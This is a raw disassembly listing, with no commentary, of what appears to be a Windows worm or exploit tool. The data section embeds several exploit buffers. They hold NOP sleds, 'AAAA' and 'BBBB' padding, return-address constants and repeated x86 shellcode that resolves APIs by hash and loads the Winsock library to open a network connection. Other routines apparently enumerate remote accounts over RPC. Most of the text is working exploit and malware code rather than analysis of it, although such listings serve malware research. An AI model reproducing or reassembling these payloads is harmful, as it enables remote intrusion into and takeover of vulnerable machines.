cmp dword ptr [ebx+4], 0
jnz short loc_40577F
mov [ebp+var_94], 0
loc_40577F: ; CODE XREF: sub_4056D0+8E�j
; sub_4056D0+A3�j
dec [ebp+var_98]
loc_405785: ; CODE XREF: sub_4056D0+5A�j
cmp [ebp+var_98], 0
jnz short loc_40572C
push [ebp+var_9C]
call dword_41BCB4
mov eax, [ebp+var_94]
jmp short loc_4057A8
; ---------------------------------------------------------------------------
loc_4057A2: ; CODE XREF: sub_4056D0+2C�j
xor eax, eax
jmp short loc_4057A8
; ---------------------------------------------------------------------------
loc_4057A6: ; CODE XREF: sub_4056D0+13�j
xor eax, eax
loc_4057A8: ; CODE XREF: sub_4056D0+D0�j
; sub_4056D0+D4�j
pop ebx
pop esi
pop edi
leave
retn 4
sub_4056D0 endp
; ---------------------------------------------------------------------------
db 90h
dd 0FFFFFFFFh, 1, 0
dd 1, 0
dd 215h, 0
dd 215h, 94h dup(90909090h), 0EFFFC481h, 0EB44FFFFh, 0E86BEB02h
dd 0FFFFFFF9h, 57565553h, 18246C8Bh, 8B3C458Bh, 3782854h
dd 184A8BD5h, 3205A8Bh, 4932E3DDh, 38B348Bh, 0FCFF33F5h
dd 38ACC033h, 0C10774E0h, 0F8030DCFh, 7C3BF2EBh, 0E1751424h
dd 3245A8Bh, 0C8B66DDh, 1C5A8B4Bh, 48BDD03h, 0EBC5038Bh
dd 5FC03302h, 895B5D5Eh, 8B042444h, 44892404h, 448B0824h
dd 0C4830424h, 6A5EC308h, 8B645930h, 0C5B8B19h, 8B1C5B8Bh
dd 87B8B1Bh, 8B1CEC83h, 50C033ECh, 78652E68h, 14658965h
dd 49EA6857h, 0D6FFE88Ah, 75FF066Ah, 89D0FF14h, 68570445h
dd 0E9238ADBh, 4589D6FFh, 8E68570Ch, 0FFEC0E4Eh, 66C933D6h
dd 516C6CB9h, 2E323368h, 73776864h, 0FF545F32h, 53D88BD0h
dd 1819B668h, 89D6FFE7h, 68531045h, 79C679E7h, 4589D6FFh
dd 6E685318h, 0FF492F0Bh, 6A066AD6h, 0FF026A01h, 84589D0h
dd 5050C033h, 0FF02B850h, 0F4800427h, 0C48B50FFh, 0FF50106Ah
dd 68530875h, 0C7701AA4h, 0D0FFD6FFh, 0A4685358h, 0FFE92EADh
dd 0FF106AD6h, 0D0FF0875h, 5050C033h, 530875FFh, 8649E568h
dd 0FFD6FF49h, 84D8BD0h, 51084589h, 811855FFh, 0FFFEFCC4h
dd 33DC8BFFh, 0FFB151C9h, 75FF5351h, 1055FF08h, 0A7EC085h
dd 75FF5350h, 0C55FF04h, 75FFE5EBh, 1855FF08h, 4C5B6857h
dd 0D6FFDD1Ah, 0FF0475FFh, 50C033D0h, 571475FFh, 8AFE9868h
dd 0FFD6FF0Eh, 0EF6857D0h, 0FF60E0CEh, 0D0FFD6h, 10h dup(2080Ah)
dd 0
dd 85h, 2, 0
dd 2, 2EBh, 85h, 0
dd 0FFFFFFFFh, 1, 0
dd 1, 0
dd 163h, 0
dd 163h, 0EFFFC481h, 8B44FFFFh, 0EB02EBECh, 0FFF9E86Bh
dd 5553FFFFh, 6C8B5756h, 458B1824h, 28548B3Ch, 8BD50378h
dd 5A8B184Ah, 0E3DD0320h, 348B4932h, 33F5038Bh, 0C033FCFFh
dd 74E038ACh, 0DCFC107h, 0F2EBF803h, 14247C3Bh, 5A8BE175h
dd 66DD0324h, 8B4B0C8Bh, 0DD031C5Ah, 38B048Bh, 3302EBC5h
dd 5D5E5FC0h, 2444895Bh, 24048B04h, 8244489h, 424448Bh
dd 0C308C483h, 364C033h, 408B3040h, 1C708B0Ch, 8788BADh
dd 50C0335Eh, 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah
dd 75FF066Ah, 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh
dd 8E68570Ch, 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h
dd 73776864h, 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h
dd 68531045h, 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh
dd 6A066AD6h, 0FF026A01h, 4589D0h, 5050C033h, 0FF02B850h
dd 0F4800427h, 0C48B50FFh, 0FF50106Ah, 68530075h, 0C7701AA4h
dd 0D0FFD6FFh, 0A4685350h, 0FFE92EADh, 75FFD6h, 5050D0FFh
dd 530075FFh, 8649E568h, 0FFD6FF49h, 4589D0h, 0FEFCC481h
dd 0DC8BFFFFh, 0B151C933h, 0FF5351FFh, 55FF0075h, 7EC08510h
dd 0FF53500Ah, 55FF0475h, 57E5EB0Ch, 1A4C5B68h, 0FFD6FFDDh
dd 0D0FF0475h, 0FF50C033h, 68571475h, 0E8AFE98h, 0D0FFD6FFh
dd 0CEEF6857h, 0D6FF60E0h, 4141D0FFh, 38h dup(41414141h)
dd 2080Ah, 2 dup(41414141h), 20804h, 8 dup(41414141h)
dd 20804h, 2 dup(41414141h), 20804h, 8 dup(41414141h)
dd 0
dd 0D7h, 1, 0
dd 1, 0
dd 0CBh, 0
dd 1E044D58h, 1, 0
dd 1, 61AB0000h, 163h, 0
dd 163h, 0EFFFC481h, 8B44FFFFh, 0EB02EBECh, 0FFF9E86Bh
dd 5553FFFFh, 6C8B5756h, 458B1824h, 28548B3Ch, 8BD50378h
dd 5A8B184Ah, 0E3DD0320h, 348B4932h, 33F5038Bh, 0C033FCFFh
dd 74E038ACh, 0DCFC107h, 0F2EBF803h, 14247C3Bh, 5A8BE175h
dd 66DD0324h, 8B4B0C8Bh, 0DD031C5Ah, 38B048Bh, 3302EBC5h
dd 5D5E5FC0h, 2444895Bh, 24048B04h, 8244489h, 424448Bh
dd 0C308C483h, 364C033h, 408B3040h, 1C708B0Ch, 8788BADh
dd 50C0335Eh, 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah
dd 75FF066Ah, 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh
dd 8E68570Ch, 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h
dd 73776864h, 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h
dd 68531045h, 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh
dd 6A066AD6h, 0FF026A01h, 4589D0h, 5050C033h, 0FF02B850h
dd 0F4800427h, 0C48B50FFh, 0FF50106Ah, 68530075h, 0C7701AA4h
dd 0D0FFD6FFh, 0A4685350h, 0FFE92EADh, 75FFD6h, 5050D0FFh
dd 530075FFh, 8649E568h, 0FFD6FF49h, 4589D0h, 0FEFCC481h
dd 0DC8BFFFFh, 0B151C933h, 0FF5351FFh, 55FF0075h, 7EC08510h
dd 0FF53500Ah, 55FF0475h, 57E5EB0Ch, 1A4C5B68h, 0FFD6FFDDh
dd 0D0FF0475h, 0FF50C033h, 68571475h, 0E8AFE98h, 0D0FFD6FFh
dd 0CEEF6857h, 0D6FF60E0h, 4141D0FFh, 42h dup(41414141h)
dd 71C8C1ECh, 2 dup(41414141h), 2 dup(71C8C1ECh), 9 dup(41414141h)
dd 7FAB0000h, 0A4h, 1, 0
dd 1, 28090000h, 64h, 11h, 0
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dd 2 dup(90909090h), 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 909008EBh, 767A1567h, 909008EBh, 767A1567h
dd 909008EBh, 767A1567h, 909008EBh, 767A1567h, 909008EBh
dd 767A1567h, 90909090h, 0EB909090h, 48909008h, 9088444Fh
dd 4 dup(90909090h), 0EFFFC481h, 0EB44FFFFh, 0E86BEB02h
dd 0FFFFFFF9h, 57565553h, 18246C8Bh, 8B3C458Bh, 3782854h
dd 184A8BD5h, 3205A8Bh, 4932E3DDh, 38B348Bh, 0FCFF33F5h
dd 38ACC033h, 0C10774E0h, 0F8030DCFh, 7C3BF2EBh, 0E1751424h
dd 3245A8Bh, 0C8B66DDh, 1C5A8B4Bh, 48BDD03h, 0EBC5038Bh
dd 5FC03302h, 895B5D5Eh, 8B042444h, 44892404h, 448B0824h
dd 0C4830424h, 6A5EC308h, 8B645930h, 0C5B8B19h, 8B1C5B8Bh
dd 87B8B1Bh, 8B1CEC83h, 50C033ECh, 78652E68h, 14658965h
dd 49EA6857h, 0D6FFE88Ah, 75FF066Ah, 89D0FF14h, 68570445h
dd 0E9238ADBh, 4589D6FFh, 8E68570Ch, 0FFEC0E4Eh, 66C933D6h
dd 516C6CB9h, 2E323368h, 73776864h, 0FF545F32h, 53D88BD0h
dd 1819B668h, 89D6FFE7h, 68531045h, 79C679E7h, 4589D6FFh
dd 6E685318h, 0FF492F0Bh, 6A066AD6h, 0FF026A01h, 84589D0h
dd 5050C033h, 0FF02B850h, 0F4800427h, 0C48B50FFh, 0FF50106Ah
dd 68530875h, 0C7701AA4h, 0D0FFD6FFh, 0A4685358h, 0FFE92EADh
dd 0FF106AD6h, 0D0FF0875h, 5050C033h, 530875FFh, 8649E568h
dd 0FFD6FF49h, 84D8BD0h, 51084589h, 811855FFh, 0FFFEFCC4h
dd 33DC8BFFh, 0FFB151C9h, 75FF5351h, 1055FF08h, 0A7EC085h
dd 75FF5350h, 0C55FF04h, 75FFE5EBh, 1855FF08h, 4C5B6857h
dd 0D6FFDD1Ah, 0FF0475FFh, 50C033D0h, 571475FFh, 8AFE9868h
dd 0FFD6FF0Eh, 0EF6857D0h, 0FF60E0CEh, 90D0FFD6h, 170h dup(90909090h)
dd 7E0h, 4, 1Eh dup(0)
dd 7A108260h, 62B0606h, 2050501h, 6E1082A0h, 6A108230h
dd 661082A1h, 62108223h, 1048203h, 41414100h, 0FFh dup(41414141h)
dd 23000341h, 3570C82h, 0A0482h, 2 dup(42904290h), 0EFFFC481h
dd 0EB44FFFFh, 0E86BEB02h, 0FFFFFFF9h, 57565553h, 18246C8Bh
dd 8B3C458Bh, 3782854h, 184A8BD5h, 3205A8Bh, 4932E3DDh
dd 38B348Bh, 0FCFF33F5h, 38ACC033h, 0C10774E0h, 0F8030DCFh
dd 7C3BF2EBh, 0E1751424h, 3245A8Bh, 0C8B66DDh, 1C5A8B4Bh
dd 48BDD03h, 0EBC5038Bh, 5FC03302h, 895B5D5Eh, 8B042444h
dd 44892404h, 448B0824h, 0C4830424h, 6A5EC308h, 8B645930h
dd 0C5B8B19h, 8B1C5B8Bh, 87B8B1Bh, 8B1CEC83h, 50C033ECh
dd 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah, 75FF066Ah
dd 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh, 8E68570Ch
dd 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h, 73776864h
dd 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h, 68531045h
dd 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh, 6A066AD6h
dd 0FF026A01h, 84589D0h, 5050C033h, 0FF02B850h, 0F4800427h
dd 0C48B50FFh, 0FF50106Ah, 68530875h, 0C7701AA4h, 0D0FFD6FFh
dd 0A4685358h, 0FFE92EADh, 0FF106AD6h, 0D0FF0875h, 5050C033h
dd 530875FFh, 8649E568h, 0FFD6FF49h, 84D8BD0h, 51084589h
dd 811855FFh, 0FFFEFCC4h, 33DC8BFFh, 0FFB151C9h, 75FF5351h
dd 1055FF08h, 0A7EC085h, 75FF5350h, 0C55FF04h, 75FFE5EBh
dd 1855FF08h, 4C5B6857h, 0D6FFDD1Ah, 0FF0475FFh, 50C033D0h
dd 571475FFh, 8AFE9868h, 0FFD6FF0Eh, 0EF6857D0h, 0FF60E0CEh
dd 55D0FFD6h, 9Ah dup(42424242h), 30A2342h, 0FF80008h
dd 0FF80001h, 8822301h, 4820339h, 43430011h, 0F0204343h
dd 56537FFDh, 0EC816657h, 0E6890080h, 0EDE8h, 6836FF00h
dd 63D61209h, 0F7E8h, 8468900h, 0A2E8h, 476FF00h, 2BD06B68h
dd 0E2E8CAh, 46890000h, 3FE80Ch, 76FF0000h, 97FA6804h
dd 0CDE84C02h, 31000000h, 41068DBh, 0FF530000h, 56C389D0h
dd 8910768Bh, 410B9C7h, 0A4F30000h, 50C0315Eh, 50535050h
dd 0C56FF50h, 6608468Bh, 80C481h, 0FF5B5E5Fh, 23E860E0h
dd 8B000000h, 8D0C2444h, 43837C58h, 4381053Ch, 100028h
dd 28638100h, 0FFFFF000h, 8324048Bh, 315014C4h, 0D231C3C0h
dd 6432FF64h, 0DB312289h, 904290B8h, 0B1C93142h, 0F3DF8902h
dd 430374AFh, 7E89F3EBh, 28F6410h, 60C36158h, 0FDF020BFh
dd 8B1F8B7Fh, 7890846h, 81F87F8Bh, 178C7h, 39F98900h, 8B047419h
dd 89F8EB09h, 45A39FAh, 528B0574h, 89F6EB04h, 44A8911h
dd 1FD43C6h, 0CA1C361h, 8B7FFDF0h, 588B1C40h, 8B1E8908h
dd 8408B00h, 0C3044689h, 246C8B60h
db 28h
byte_40741D db 8Bh, 45h, 3Ch ; DATA XREF: rdata:004052E3�o
dd 7805548Bh, 4A8BEA01h, 205A8B18h, 38E3EB01h, 8B348B49h
dd 0FF31EE01h, 0ACFCC031h, 774E038h, 10DCFC1h, 3BF4EBC7h
dd 7524247Ch, 245A8BE1h, 8B66EB01h, 5A8B4B0Ch, 8BEB011Ch
db 4
byte_40745D db 8Bh, 1, 0E8h ; DATA XREF: rdata:00405460�o
dd 1C244489h, 8C261h, 4343FEEBh, 0A5h dup(43434343h)
unk_407700 db 43h ; C ; DATA XREF: sub_4099E5+AF�o
db 3 dup(43h)
db 43h ; C
db 3 dup(43h)
db 43h ; C
db 3 dup(43h)
db 43h ; C
db 43h, 23h, 82h
db 4
db 20h, 3, 9
db 0
db 0EBh, 6, 90h
db 90h ;
db 3 dup(90h)
db 90h ;
db 3, 82h, 4
db 11h
align 2
aDddddddddddddd db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 'DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD'
db 0
align 4
dd 4 dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B46 proc near ; CODE XREF: sub_408440+EB�p
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_224 = byte ptr -224h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_3C = byte ptr -3Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFD90h
push edi
push esi
push ebx
mov [ebp+var_270], 0
push [ebp+arg_0]
call sub_40A320
push eax
lea eax, [ebp+var_260]
push eax
call sub_40A25A
push 0
push offset byte_418403
push offset byte_4183F5
lea eax, [ebp+var_260]
push eax
call sub_411800
mov [ebp+var_8C], eax
cmp eax, 0FFFFFFFBh
jnz short loc_407B99
jmp loc_40808E
; ---------------------------------------------------------------------------
loc_407B99: ; CODE XREF: sub_407B46+4C�j
cmp eax, 0FFFFFFFFh
jnz short loc_407BB6
push 0
push 0
push 0
lea eax, [ebp+var_260]
push eax
call sub_411800
mov [ebp+var_8C], eax
loc_407BB6: ; CODE XREF: sub_407B46+56�j
cmp eax, 0FFFFFFFBh
jnz short loc_407BC0
jmp loc_40808E
; ---------------------------------------------------------------------------
loc_407BC0: ; CODE XREF: sub_407B46+73�j
cmp eax, 0FFFFFFFFh
jz loc_40808E
push offset byte_4183E3
push [ebp+var_8C]
call sub_410F30
mov [ebp+var_90], eax
cmp eax, 0FFFFFFFFh
jz loc_408083
push offset byte_4183DB
push [ebp+var_90]
call sub_411080
mov [ebp+var_94], eax
cmp eax, 0FFFFFFFFh
jz loc_408078
push offset byte_4183C7
push [ebp+var_94]
call sub_4111E0
or eax, eax
jnz loc_408078
lea eax, [ebp+var_7C]
push eax
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_260]
push eax
call sub_408200
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 2Ch
push [ebp+var_94]
call sub_412840
mov [ebp+var_26C], eax
push [ebp+var_80]
call sub_411CE0
mov edx, [ebp+var_88]
mov ecx, [ebp+var_84]
or ecx, ecx
jz short loc_407C7B
cmp [ebp+var_26C], 0
jz short loc_407C80
loc_407C7B: ; CODE XREF: sub_407B46+12A�j
jmp loc_40806D
; ---------------------------------------------------------------------------
loc_407C80: ; CODE XREF: sub_407B46+133�j
mov eax, [ecx+edx-4]
or eax, eax
jz short loc_407C8D
jmp loc_40806D
; ---------------------------------------------------------------------------
loc_407C8D: ; CODE XREF: sub_407B46+140�j
push 14h
push [ebp+var_88]
lea eax, [ebp+var_3C]
push eax
call sub_40F5BF
mov [ebp+var_264], 0
lea esi, byte_41884B
jmp loc_407D9F
; ---------------------------------------------------------------------------
loc_407CB3: ; CODE XREF: sub_407B46+25C�j
mov [ebp+var_268], 0
lea eax, [ebp+var_7C]
push eax
lea eax, [ebp+var_80]
push eax
push dword ptr [esi]
lea eax, [ebp+var_3C]
push eax
call sub_408140
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 3Ah
push [ebp+var_94]
call sub_412840
mov [ebp+var_26C], eax
push [ebp+var_80]
call sub_411CE0
mov edx, [ebp+var_88]
mov ecx, [ebp+var_84]
or ecx, ecx
jz short loc_407D18
cmp [ebp+var_26C], 0
jz short loc_407D82
loc_407D18: ; CODE XREF: sub_407B46+1C7�j
mov [ebp+var_268], 1
lea eax, [ebp+var_7C]
push eax
lea eax, [ebp+var_80]
push eax
push dword ptr [esi]
lea eax, [ebp+var_3C]
push eax
call sub_408140
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 0Eh
push [ebp+var_94]
call sub_412840
mov [ebp+var_26C], eax
push [ebp+var_80]
call sub_411CE0
mov edx, [ebp+var_88]
mov ecx, [ebp+var_84]
or ecx, ecx
jz short loc_407D7D
cmp [ebp+var_26C], 0
jz short loc_407D82
loc_407D7D: ; CODE XREF: sub_407B46+22C�j
jmp loc_40804C
; ---------------------------------------------------------------------------
loc_407D82: ; CODE XREF: sub_407B46+1D0�j
; sub_407B46+235�j
cmp dword ptr [edx+ecx-8], 0
jz short loc_407D9C
cmp dword ptr [edx+ecx-4], 0
jnz short loc_407D9C
mov [ebp+var_264], 1
jmp short loc_407DA8
; ---------------------------------------------------------------------------
loc_407D9C: ; CODE XREF: sub_407B46+241�j
; sub_407B46+248�j
add esi, 4
loc_407D9F: ; CODE XREF: sub_407B46+168�j
cmp dword ptr [esi], 0
jnz loc_407CB3
loc_407DA8: ; CODE XREF: sub_407B46+254�j
cmp [ebp+var_264], 1
jz short loc_407DB6
jmp loc_40804C
; ---------------------------------------------------------------------------
loc_407DB6: ; CODE XREF: sub_407B46+269�j
mov esi, [ebp+var_88]
mov ecx, [esi+28h]
shl ecx, 1
add ecx, 3
and cl, 0FCh
add ecx, 2Ch
add esi, ecx
add esi, 3
and esi, 0FFFFFFFCh
add esi, 4
lea edi, [ebp+var_78]
push 18h
push esi
push edi
call sub_40F5BF
inc byte ptr [edi+1]
mov ebx, 1
mov esi, 1F4h
jmp loc_407EFE
; ---------------------------------------------------------------------------
loc_407DF3: ; CODE XREF: sub_407B46+3BA�j
mov [edi+18h], esi
lea eax, [ebp+var_7C]
push eax
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_4080A0
cmp [ebp+var_268], 0
jnz short loc_407E37
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 39h
push [ebp+var_94]
call sub_412840
jmp short loc_407E58
; ---------------------------------------------------------------------------
loc_407E37: ; CODE XREF: sub_407B46+2CC�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 0Fh
push [ebp+var_94]
call sub_412840
loc_407E58: ; CODE XREF: sub_407B46+2EF�j
mov [ebp+var_26C], eax
push [ebp+var_80]
call sub_411CE0
mov edx, [ebp+var_88]
mov ecx, [ebp+var_84]
or ecx, ecx
jz short loc_407E7F
cmp [ebp+var_26C], 0
jz short loc_407E84
loc_407E7F: ; CODE XREF: sub_407B46+32E�j
jmp loc_40804C
; ---------------------------------------------------------------------------
loc_407E84: ; CODE XREF: sub_407B46+337�j
cmp dword ptr [edx+ecx-4], 0
jnz short loc_407EFC
mov ecx, [edx+28h]
shl ecx, 1
add ecx, 3
and cl, 0FCh
add ecx, 2Ch
add edx, ecx
add edx, 3
and dl, 0FCh
add edx, 1Ch
cmp [ebp+var_268], 0
jnz short loc_407EB2
add edx, 2Ch
jmp short loc_407EB5
; ---------------------------------------------------------------------------
loc_407EB2: ; CODE XREF: sub_407B46+365�j
add edx, 28h
loc_407EB5: ; CODE XREF: sub_407B46+36A�j
mov ecx, [edx-4]
shl ecx, 1
mov dword ptr [ecx+edx], 0
push 0
push 0
push 190h
lea eax, [ebp+var_224]
push eax
push 0FFFFFFFFh
push edx
push 0
push 0
call sub_40A23C
mov eax, [ebp+arg_4]
mov edx, [ebp+var_270]
mov ecx, [eax+edx*4]
lea eax, [ebp+var_224]
push eax
push ecx
call sub_40A25A
inc [ebp+var_270]
loc_407EFC: ; CODE XREF: sub_407B46+343�j
inc esi
dec ebx
loc_407EFE: ; CODE XREF: sub_407B46+2A8�j
or ebx, ebx
jnz loc_407DF3
mov ebx, 0Ah
mov esi, 3E8h
jmp loc_408044
; ---------------------------------------------------------------------------
loc_407F15: ; CODE XREF: sub_407B46+500�j
mov [edi+18h], esi
lea eax, [ebp+var_7C]
push eax
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+var_78]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_4080A0
cmp [ebp+var_268], 0
jnz short loc_407F59
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 39h
push [ebp+var_94]
call sub_412840
jmp short loc_407F7A
; ---------------------------------------------------------------------------
loc_407F59: ; CODE XREF: sub_407B46+3EE�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push [ebp+var_7C]
push [ebp+var_80]
push 0Fh
push [ebp+var_94]
call sub_412840
loc_407F7A: ; CODE XREF: sub_407B46+411�j
mov [ebp+var_26C], eax
push [ebp+var_80]
call sub_411CE0
mov edx, [ebp+var_88]
mov ecx, [ebp+var_84]
or ecx, ecx
jz short loc_407FA1
cmp [ebp+var_26C], 0FFFFFFFFh
jnz short loc_407FA6
loc_407FA1: ; CODE XREF: sub_407B46+450�j
jmp loc_40804C
; ---------------------------------------------------------------------------
loc_407FA6: ; CODE XREF: sub_407B46+459�j
cmp dword ptr [edx+ecx-4], 0
jnz loc_408042
mov ecx, [edx+28h]
shl ecx, 1
add ecx, 3
and cl, 0FCh
add ecx, 2Ch
add edx, ecx
add edx, 3
and dl, 0FCh
add edx, 1Ch
cmp [ebp+var_268], 0
jnz short loc_407FD8
add edx, 2Ch
jmp short loc_407FDB
; ---------------------------------------------------------------------------
loc_407FD8: ; CODE XREF: sub_407B46+48B�j
add edx, 28h
loc_407FDB: ; CODE XREF: sub_407B46+490�j
mov ecx, [edx-4]
shl ecx, 1
mov dword ptr [ecx+edx], 0
push 0
push 0
push 190h
lea eax, [ebp+var_224]
push eax
push 0FFFFFFFFh
push edx
push 0
push 0
call sub_40A23C
cmp eax, 46h
jnb short loc_408042
lea eax, [ebp+var_224]
push eax
call sub_4082A0
or eax, eax
jnz short loc_408042
cmp [ebp+var_270], 5
jbe short loc_408023
jmp short loc_40804C
; ---------------------------------------------------------------------------
loc_408023: ; CODE XREF: sub_407B46+4D9�j
mov eax, [ebp+arg_4]
mov edx, [ebp+var_270]
mov ecx, [eax+edx*4]
lea eax, [ebp+var_224]
push eax
push ecx
call sub_40A25A
inc [ebp+var_270]
loc_408042: ; CODE XREF: sub_407B46+465�j
; sub_407B46+4C0�j ...
inc esi
dec ebx
loc_408044: ; CODE XREF: sub_407B46+3CA�j
or ebx, ebx
jnz loc_407F15
loc_40804C: ; CODE XREF: sub_407B46:loc_407D7D�j
; sub_407B46+26B�j ...
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_88]
push eax
push 14h
lea eax, [ebp+var_3C]
push eax
push 0
push [ebp+var_94]
call sub_412840
loc_40806D: ; CODE XREF: sub_407B46:loc_407C7B�j
; sub_407B46+142�j
push [ebp+var_94]
call sub_412230
loc_408078: ; CODE XREF: sub_407B46+BB�j
; sub_407B46+D3�j
push [ebp+var_90]
call sub_412230
loc_408083: ; CODE XREF: sub_407B46+9C�j
push [ebp+var_8C]
call sub_412230
loc_40808E: ; CODE XREF: sub_407B46+4E�j
; sub_407B46+75�j ...
mov eax, [ebp+var_270]
pop ebx
pop esi
pop edi
leave
retn 8
sub_407B46 endp
; ---------------------------------------------------------------------------
db 5
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4080A0 proc near ; CODE XREF: sub_407B46+2C0�p
; sub_407B46+3E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
push 258h
push 40h
call sub_40A1D0
mov [ebp+var_4], eax
mov edi, eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
push 14h
push [ebp+arg_0]
push edi
call sub_40F5BF
add edi, 14h
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 0FFFFFFFFh
add edi, 4
mov dword ptr [edi], 5
add edi, 4
push 1Ch
push [ebp+arg_4]
push edi
call sub_40F5BF
add edi, 1Ch
add edi, 4
add edi, 4
mov dword ptr [edi], 1
add edi, 4
add edi, 4
add edi, 4
mov dword ptr [edi], 2
add edi, 4
mov esi, [ebp+var_4]
sub edi, esi
mov ecx, [ebp+arg_C]
mov [ecx], edi
mov eax, edi
pop ebx
pop esi
pop edi
leave
retn 10h
sub_4080A0 endp
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408140 proc near ; CODE XREF: sub_407B46+185�p
; sub_407B46+1EA�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push edi
push esi
push ebx
push 258h
push 40h
call sub_40A1D0
mov [ebp+var_4], eax
mov edi, eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
push 14h
push [ebp+arg_0]
push edi
call sub_40F5BF
add edi, 14h
mov dword ptr [edi], 1
add edi, 4
mov dword ptr [edi], 1
add edi, 4
push [ebp+arg_4]
call sub_40A26C
mov esi, eax
shl eax, 1
mov ebx, eax
mov [edi], ax
add edi, 2
add ax, 2
mov [edi], ax
add edi, 2
mov dword ptr [edi], 0FFFFFFFFh
